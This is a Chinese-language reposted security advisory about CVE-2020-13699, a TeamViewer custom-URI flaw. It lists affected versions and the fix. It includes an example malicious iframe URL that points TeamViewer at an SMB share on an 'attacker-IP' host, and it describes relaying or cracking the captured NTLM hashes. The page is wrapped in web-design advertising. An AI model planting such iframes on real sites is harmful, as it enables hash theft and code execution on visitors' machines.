本篇文章給大家分享的是有關(guān)怎么解析TeamViewer 用戶密碼破解漏洞,小編覺得挺實用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
我們提供的服務(wù)有:成都網(wǎng)站制作、做網(wǎng)站、外貿(mào)營銷網(wǎng)站建設(shè)、微信公眾號開發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認證、海港ssl等。為1000+企事業(yè)單位解決了網(wǎng)站和推廣的問題。提供周到的售前咨詢和貼心的售后服務(wù),是有科學(xué)管理、有技術(shù)的海港網(wǎng)站制作公司
2020年08月10日,360CERT監(jiān)測發(fā)現(xiàn)TeamViewer官方
發(fā)布了TeamViewerURL處理
的風(fēng)險通告,該漏洞編號為CVE-2020-13699
,漏洞等級:高危
,漏洞評分:8.8分
。TeamViewer
存在未引用的搜索路徑或元素的安全缺陷,更具體地說,這是由于應(yīng)用程序沒有正確引用它的自定義URI
處理程序,當(dāng)安裝了TeamViewer
的易受攻擊版本的用戶訪問惡意創(chuàng)建的網(wǎng)站時,可能會被黑客利用。
對此,360CERT建議廣大用戶及時將TeamViewer
升級到15.8.3
版本。與此同時,請做好資產(chǎn)自查以及預(yù)防工作,以免遭受黑客攻擊。
360CERT對該漏洞的評定結(jié)果如下
評定方式 | 等級 |
---|---|
威脅等級 | 高危 |
影響面 | 廣泛 |
360CERT評分 | 8.8分 |
TeamViewer
主要用于遠程訪問和控制各種類型的計算機系統(tǒng)和移動設(shè)備,但也提供協(xié)作和演示功能(例如,桌面共享、網(wǎng)絡(luò)會議、文件傳輸?shù)?。
TeamViewer
存在未引用的搜索路徑或元素的安全缺陷,更具體地說,這是由于應(yīng)用程序沒有正確引用它的自定義URI
處理程序,當(dāng)安裝了TeamViewer
的易受攻擊版本的系統(tǒng)訪問惡意創(chuàng)建的網(wǎng)站時,可能會被利用,攻擊者可以使用精心制作的URL(iframesrc='teamviewer10:--play\\attacker-IP\share\fake.tvs'
)將惡意iframe
嵌入網(wǎng)站中,這將啟動TeamViewerWindows
桌面客戶端并強制其執(zhí)行以下操作:打開遠程SMB
共享。Windows
在打開SMB
共享時將執(zhí)行NTLM
身份驗證,并且可以將請求進行轉(zhuǎn)發(fā)(使用諸如響應(yīng)程序之類的工具)以執(zhí)行代碼(或捕獲以進行哈希破解)。
TeamViewer<8.0.258861
TeamViewer<9.0.28860
TeamViewer<10.0.258873
TeamViewer<11.0.258870
TeamViewer<12.0.258869
TeamViewer<13.2.36220
TeamViewer<14.2.56676
TeamViewer<15.8.3
升級到15.8.3
版本,下載地址為:
Previous TeamViewer versions 10 – 11 – 12 – 13 – 14
https://www.teamviewer.com/en/download/previous-versions/
360安全大腦-Quake網(wǎng)絡(luò)空間測繪系統(tǒng)通過對全網(wǎng)資產(chǎn)測繪,發(fā)現(xiàn)TeamViewer
在全球
均有廣泛使用,具體分布如下圖所示。
360安全大腦的QUAKE資產(chǎn)測繪平臺通過資產(chǎn)測繪技術(shù)手段,對該類漏洞進行監(jiān)測,請用戶聯(lián)系相關(guān)產(chǎn)品區(qū)域負責(zé)人或(quake##)獲取對應(yīng)產(chǎn)品。
以上就是怎么解析TeamViewer 用戶密碼破解漏洞,小編相信有部分知識點可能是我們?nèi)粘9ぷ鲿姷交蛴玫降?。希望你能通過這篇文章學(xué)到更多知識。更多詳情敬請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。
文章名稱:怎么解析TeamViewer用戶密碼破解漏洞
當(dāng)前地址:http://muchs.cn/article12/jepsdc.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供外貿(mào)建站、品牌網(wǎng)站設(shè)計、做網(wǎng)站、手機網(wǎng)站建設(shè)、域名注冊、商城網(wǎng)站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)